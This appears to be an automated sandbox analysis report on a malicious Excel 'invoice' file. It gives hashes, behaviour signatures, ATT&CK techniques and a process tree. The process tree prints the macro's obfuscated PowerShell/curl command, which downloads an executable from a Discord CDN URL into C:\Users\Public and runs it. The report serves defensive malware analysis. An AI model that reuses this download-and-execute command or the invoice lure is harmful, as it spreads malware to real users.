Analysis

  • max time kernel
    110s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-11-2022 17:16

General

  • Target

    Invoice-N192793.xls

  • Size

    102KB

  • MD5

    a88329a0eca1ff4a5d59dd6270d08267

  • SHA1

    a812bbcb57431be5b0d436590ae4a53465bb1e25

  • SHA256

    bf57ecd7a6c0166dd27f311cebda08ed8e9305cfaa66fe68131ba29250ba94f3

  • SHA512

    a7bc77709e943d92af345073f639a54d195258020bf5b7ca178eae6b7c90a1d984f2af660aa6e5112ec8389ff0dd27493244e22540acc3ae80ac7792fe066ec5

  • SSDEEP

    3072:4k3hOdsylKlgryzc4bNhZFGzE+cL2knAk6vy/sUeo0JSpfiXa:4k3hOdsylKlgryzc4bNhZF+E+W2knAj

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice-N192793.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4372
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://cdn.discordapp.com/attachments/1036705838334746685/1046122909879513129/Sdcjiemg.e^xe -o C:\Users\Public\s2zq4.exe;C:\Users\Public\s2zq4.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://cdn.discordapp.com/attachments/1036705838334746685/1046122909879513129/Sdcjiemg.exe -o C:\Users\Public\s2zq4.exe;C:\Users\Public\s2zq4.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:824
        • C:\Users\Public\s2zq4.exe
          "C:\Users\Public\s2zq4.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2480
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1456
            5⤵
            • Program crash
            PID:2916
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2480 -ip 2480
    1⤵
      PID:4596

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\s2zq4.exe
      Filesize

      9KB

      MD5

      31274edfe5023d4e00bdd966a22da3ae

      SHA1

      fb3ea63b6c795952fe8a4662f9bf4a75c1f73212

      SHA256

      1d6945a059e726e60a3892d81c3f8f8bb985096ae059d0e9f4011340b86dd910

      SHA512

      b8d4fa949ec2f96ebd1efe5949e3c0833fb69076fcce346dabe5fd99a72bce8a8a764d7d5e283ee84c20a0b2b8da3537f4f7fbdc86374600063a835f980dd16b

    • C:\Users\Public\s2zq4.exe
      Filesize

      9KB

      MD5

      31274edfe5023d4e00bdd966a22da3ae

      SHA1

      fb3ea63b6c795952fe8a4662f9bf4a75c1f73212

      SHA256

      1d6945a059e726e60a3892d81c3f8f8bb985096ae059d0e9f4011340b86dd910

      SHA512

      b8d4fa949ec2f96ebd1efe5949e3c0833fb69076fcce346dabe5fd99a72bce8a8a764d7d5e283ee84c20a0b2b8da3537f4f7fbdc86374600063a835f980dd16b

    • memory/824-140-0x0000000000000000-mapping.dmp
    • memory/824-146-0x00007FFD35E00000-0x00007FFD368C1000-memory.dmp
      Filesize

      10.8MB

    • memory/824-142-0x00007FFD35E00000-0x00007FFD368C1000-memory.dmp
      Filesize

      10.8MB

    • memory/824-141-0x0000025ACF7A0000-0x0000025ACF7C2000-memory.dmp
      Filesize

      136KB

    • memory/2480-147-0x0000000000460000-0x0000000000468000-memory.dmp
      Filesize

      32KB

    • memory/2480-143-0x0000000000000000-mapping.dmp
    • memory/4184-139-0x0000000000000000-mapping.dmp
    • memory/4372-134-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB

    • memory/4372-135-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB

    • memory/4372-137-0x00007FFD1E2C0000-0x00007FFD1E2D0000-memory.dmp
      Filesize

      64KB

    • memory/4372-136-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB

    • memory/4372-138-0x00007FFD1E2C0000-0x00007FFD1E2D0000-memory.dmp
      Filesize

      64KB

    • memory/4372-133-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB

    • memory/4372-132-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB

    • memory/4372-149-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB

    • memory/4372-150-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB

    • memory/4372-152-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB

    • memory/4372-151-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
      Filesize

      64KB